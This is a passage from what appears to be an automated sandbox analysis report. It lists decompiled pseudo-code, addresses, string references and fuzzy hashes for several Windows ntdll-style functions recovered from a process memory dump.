				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E049195D0();
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0490d29c
0x0490d2a6
0x0490d2b1
0x0490d2b5
0x0490d2b6
0x0490d2bc
0x0490d2bd
0x0490d2be
0x0490d2bf
0x0490d2c2
0x0490d2c4
0x0490d2cc
0x0490d384
0x0490d34b
0x0490d34f
0x0490d350
0x0490d351
0x0490d35c
0x0490d35c
0x0490d2d6
0x0490d2da
0x0490d2e1
0x0490d361
0x0490d369
0x0490d36d
0x0490d2e3
0x0490d2e3
0x0490d2e3
0x0490d2e5
0x0490d2ed
0x0490d2f5
0x0490d2fa
0x0490d302
0x0490d303
0x0490d30b
0x0490d30f
0x0490d313
0x0490d318
0x0490d31c
0x0490d320
0x0490d379
0x0490d37d
0x00000000
0x00000000
0x0494affe
0x0494b001
0x0494b011
0x00000000
0x0490d322
0x0490d322
0x0490d330
0x0490d337
0x0490d35d
0x0490d339
0x0490d33f
0x0490d38c
0x0490d38c
0x0490d33f
0x0490d349
0x00000000
0x0490d349

Strings

@, xrefs: 0490D303

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8de33d561fc42cb051f7cdeb893b17ede2d2128ca930f1bfe8cc2ac42ce6d006
Instruction ID: 1a428dfaab33c392240008fa253f11690a4d5d94ba4a705e586594361f641567
Opcode Fuzzy Hash: 8de33d561fc42cb051f7cdeb893b17ede2d2128ca930f1bfe8cc2ac42ce6d006
Instruction Fuzzy Hash: F831A1B26083059FD711DF68C88096BBBE9EBC5758F004A3EF99483250E638FD04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 048E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E048E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0491BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0491A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0491A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L048F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x048e1b8f
0x048e1b9a
0x048e1b9c
0x048e1b9e
0x048e1ba3
0x04937010
0x04937010
0x00000000
0x048e1ba9
0x048e1ba9
0x048e1bae
0x00000000
0x048e1bc5
0x048e1bca
0x048e1bcf
0x048e1bd0
0x048e1bd1
0x048e1bd2
0x048e1bd6
0x048e1bdc
0x048e1be0
0x04936ffc
0x04937000
0x00000000
0x04937006
0x04937009
0x04937009
0x048e1be6
0x048e1bec
0x048e1c0b
0x048e1c0b
0x048e1c0c
0x048e1c11
0x048e1c12
0x048e1c15
0x048e1c1b
0x048e1c1f
0x048e1c31
0x048e1c33
0x04937026
0x04937026
0x048e1c21
0x048e1c24
0x048e1c24
0x048e1bee
0x048e1bee
0x048e1bf2
0x048e1c3a
0x048e1bf4
0x048e1bf4
0x048e1c05
0x048e1c05
0x048e1c09
0x048e1c3e
0x00000000
0x00000000
0x00000000
0x048e1c09
0x048e1bec
0x048e1be0
0x048e1bae
0x048e1c2e

Strings

WindowsExcludedProcs, xrefs: 048E1BC5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: efe94654b301da3463563a7fa0f71c79a9008359256ecb6fb6a45d521e601429
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: BB21F57660162CABDB219E9B8944F6BB7ADEF83B55F054975F904DB200E630FD00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 048FF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E048FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x048ff71d
0x048ff722
0x048ff726
0x04944770
0x048ff765
0x048ff769
0x048ff769
0x048ff732
0x0494477a
0x00000000
0x0494477a
0x048ff738
0x048ff73a
0x048ff73c
0x048ff73f
0x048ff746
0x048ff778
0x048ff7a9
0x048ff7a9
0x048ff754
0x048ff75a
0x048ff75d
0x048ff75f
0x048ff761
0x048ff76f
0x048ff771
0x048ff771
0x048ff76f
0x048ff763
0x00000000
0x048ff763
0x048ff77d
0x048ff7a3
0x048ff7a5
0x00000000
0x048ff7a5
0x048ff77f
0x048ff782
0x048ff784
0x048ff786
0x00000000
0x00000000
0x00000000
0x048ff788
0x048ff748
0x048ff74d
0x048ff78d
0x048ff793
0x048ff7b7
0x048ff7bc
0x00000000
0x048ff7bc
0x048ff798
0x00000000
0x00000000
0x048ff79d
0x048ff7b0
0x00000000
0x048ff7b0
0x048ff79f
0x00000000
0x048ff74f
0x048ff74f
0x00000000
0x048ff74f

Strings

Actx , xrefs: 048FF73F

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 3d1094640b6bda0feebe97ff2d82496acdb64adabf982be05a3b068d82945f93
Instruction ID: 9f26b8c129834ea82893b8e88cff38fff98b2a04f92ce28149506e1722d7dafb
Opcode Fuzzy Hash: 3d1094640b6bda0feebe97ff2d82496acdb64adabf982be05a3b068d82945f93
Instruction Fuzzy Hash: E0117F35304E868BE7244E198C90736F295AB85728F284F2BE761DB3A1FB60F8418340

Uniqueness

Uniqueness Score: -1.00%

Function 04988DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E04988DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x49b0d50);
				E0492D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E04965720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0492DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0492DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0492D130(_t34, _t39, _t40);
			}

0x04988df1
0x04988df1
0x04988df1
0x04988df1
0x04988df1
0x04988df1
0x04988df3
0x04988df8
0x04988dfd
0x04988e00
0x04988e0e
0x04988e2a
0x04988e36
0x04988e38
0x04988e3c
0x04988e46
0x04988e46
0x04988e36
0x04988e50
0x04988e56
0x04988e59
0x04988e5c
0x04988e60
0x04988e67
0x04988e6d
0x04988e73
0x04988e74
0x04988eb1
0x04988ebd

Strings

Critical error detected %lx, xrefs: 04988E21

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5648ab32f9dfb5e8d3f635babf4e0dc0b35f05d8f19ce3eef35c31d3d1e2d941
Instruction ID: 887f5f67ac68bfdcdefaf1e9a2557271b4ed306665aa54a1f4e9a0d3b173fe1e
Opcode Fuzzy Hash: 5648ab32f9dfb5e8d3f635babf4e0dc0b35f05d8f19ce3eef35c31d3d1e2d941
Instruction Fuzzy Hash: 21118B71D00348DBEF24EFA886097DDBBB4BB44314F20426DD069AB282C3346602CF24

Uniqueness

Uniqueness Score: -1.00%

Function 0496FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0496FF60

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 861612d02aeee917a310de4fd8cf03858ebba6a60a1c21ca402308f6fe91e9f5
Instruction ID: d04db0fb94733222bad7d66f6ea668328b3c9e74ea0e8e973b3d8b951cf61799
Opcode Fuzzy Hash: 861612d02aeee917a310de4fd8cf03858ebba6a60a1c21ca402308f6fe91e9f5
Instruction Fuzzy Hash: 08110071990244EFEB12DF50D949F98BBB2FF88718F148078E10A6B6A5C739B940DB50

Uniqueness

Uniqueness Score: -1.00%

Function 049A5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E049A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x49b1178);
				E0492D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E049A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0491D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E049A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x49c60e8;
								if( *0x49c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x49c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E04919710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04916DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0491F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0491F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0491F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0491FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0491FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0491F3E0(_t479 + _t427, _t457, _t506);
